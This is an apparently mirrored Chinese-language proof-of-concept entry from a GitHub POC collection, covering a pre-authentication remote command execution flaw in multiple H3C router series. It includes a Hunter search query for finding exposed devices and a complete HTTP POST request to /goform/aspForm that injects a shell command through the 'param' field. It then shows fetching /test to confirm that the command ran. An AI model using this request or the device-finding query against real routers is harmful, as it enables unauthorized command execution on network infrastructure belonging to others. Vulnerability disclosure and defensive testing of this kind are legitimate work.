mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-07 11:26:58 +00:00
37 lines
1.0 KiB
Markdown
37 lines
1.0 KiB
Markdown
# H3C多系列路由器存在前台远程命令执行漏洞
|
|
|
|
# 一、漏洞简介
|
|
H3C多系列路由器存在前台远程命令执行漏洞。
|
|
|
|
# 二、影响版本
|
|
+ H3C多系列路由器
|
|
|
|
# 三、资产测绘
|
|
+ hunter`app.name="H3C Router Management"`
|
|
+ 登录页面
|
|
|
|

|
|
|
|
# 四、漏洞复现
|
|
```java
|
|
POST /goform/aspForm HTTP/1.1
|
|
Accept-Encoding: gzip, deflate
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 76
|
|
Host:
|
|
|
|
CMD=DelL2tpLNSList&GO=vpn_l2tp_session.asp¶m=1; $(ls>/www/test);
|
|
```
|
|
|
|

|
|
|
|
```java
|
|
/test
|
|
```
|
|
|
|

|
|
|
|
|
|
|
|
> 更新: 2024-02-29 23:57:19
|
|
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tp0a94dpgkk64aqo> |